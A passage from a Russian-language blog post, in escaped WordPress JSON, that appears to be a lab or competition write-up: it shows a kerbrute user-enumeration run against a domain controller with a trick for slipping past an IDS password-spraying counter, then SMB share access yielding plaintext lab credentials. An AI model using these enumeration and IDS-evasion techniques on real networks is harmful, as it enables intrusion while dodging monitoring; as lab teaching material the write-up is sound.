\u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0432\u0430\u0435\u0442 \u0441\u0447\u0435\u0442\u0447\u0438\u043a, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0432\u0445\u043e\u0434\u0430 \u043f\u043e\u0434 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438, \u0438 \u0443\u043c\u0435\u043d\u044c\u0448\u0430\u0435\u0442 \u0441\u0447\u0435\u0442\u0447\u0438\u043a, \u0435\u0441\u043b\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442\u0441\u044f. \u0421\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442, \u0435\u0441\u043b\u0438 \u0441\u0447\u0435\u0442\u0447\u0438\u043a \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 \u043f\u043e\u0440\u043e\u0433\u043e\u0432\u043e\u0433\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f. \u0414\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u044d\u0442\u043e\u0433\u043e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0440\u0438 \u0440\u0430\u0437\u0430 \u043f\u043e\u0434\u0440\u044f\u0434. \u0422\u043e\u0433\u0434\u0430 kerbrute \u0437\u0430\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0434\u0432\u0443\u043c\u044f \u043f\u043e\u0442\u043e\u043a\u0430\u043c\u0438:<\/p>\n<pre><code>date; \/home\/user\/.local\/bin\/kerbrute -dc-ip 10.0.0.145 -domain evil.corp -threads 2 -users usernames.txt; date Fri Apr 29 17:13:47 MSK 2022 Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation [*] Valid user => user1_d2 [*] Valid user => user2_de ... [*] Valid user => user14_51 [*] Valid user => user15_1e [*] Valid user => user16_33 [*] No passwords were discovered :'( Fri Apr 29 17:20:27 MSK 2022<\/code><\/pre>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433 d2de3e88e1fa800fbed902a999511e33 \u0437\u0430 6 \u043c\u0438\u043d\u0443\u0442 40 \u0441\u0435\u043a\u0443\u043d\u0434.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 4: WIN-FS98F6 (35 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0440\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f, \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0432 \u043f\u043e\u0440\u0442\u044b \u0443\u0437\u043b\u0430 10.0.0.21, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b \u043b\u0438\u0448\u044c \u043f\u043e\u0440\u0442 445. \u0417\u0430\u0439\u0434\u044f \u043f\u043e SMB \u043d\u0430 \u0443\u0437\u0435\u043b \u043b\u044e\u0431\u044b\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u043c, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043d\u0430\u0445\u043e\u0434\u0438\u043b \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0443\u044e \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0448\u0430\u0440\u0443:<\/p>\n<pre><code>user@ubuntu1:~$ smbclient.py 10.0.0.21 Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation \u00a0 Type help for list of commands # shares flag users IPC$ # use flag [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) # use users # ls -rw-rw-rw-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 105\u00a0 Sat May\u00a0 7 18:02:48 2022 users.txt # cat users.txt I can even publish my credentials here. Our IDS is so good, no one won't get through sammy:samm3P@ssw0rd<\/code><\/pre>\n<p>\u0417\u043d\u0430\u043d\u0438\u0435 The Lord of the Rings \u0432 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043b\u0438\u0448\u044c \u0442\u0435\u043c, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0437\u043e\u0432\u0443\u0442 sammy. \u041f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u044f\u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043b\u043e\u0433\u0438\u043d\u0430 \u043f\u043e\u0434 \u044d\u0442\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435 (\u0432 \u0444\u0430\u0439\u043b\u0435 users.txt \u0432\u0435\u0434\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e, \u0447\u0442\u043e IDS \u0445\u043e\u0440\u043e\u0448\u0430\u044f), \u043f\u0440\u0438\u0447\u0435\u043c smbclient \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 samba-tool \u0438 smbclient.py \u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Impacket \u0432\u044b\u0434\u0430\u0432\u0430\u043b\u0438 \u0440\u0430\u0437\u043d\u044b\u0435 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u044f:<\/p>\n<pre><code>smbclient.py sammy:samm3P@ssw0rd@10.0.0.21 ATTACK [PTsecurity] User sammy login from unknown place  smbclient<\/code><\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-333912","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/333912","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=333912"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/333912\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=333912"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=333912"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=333912"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}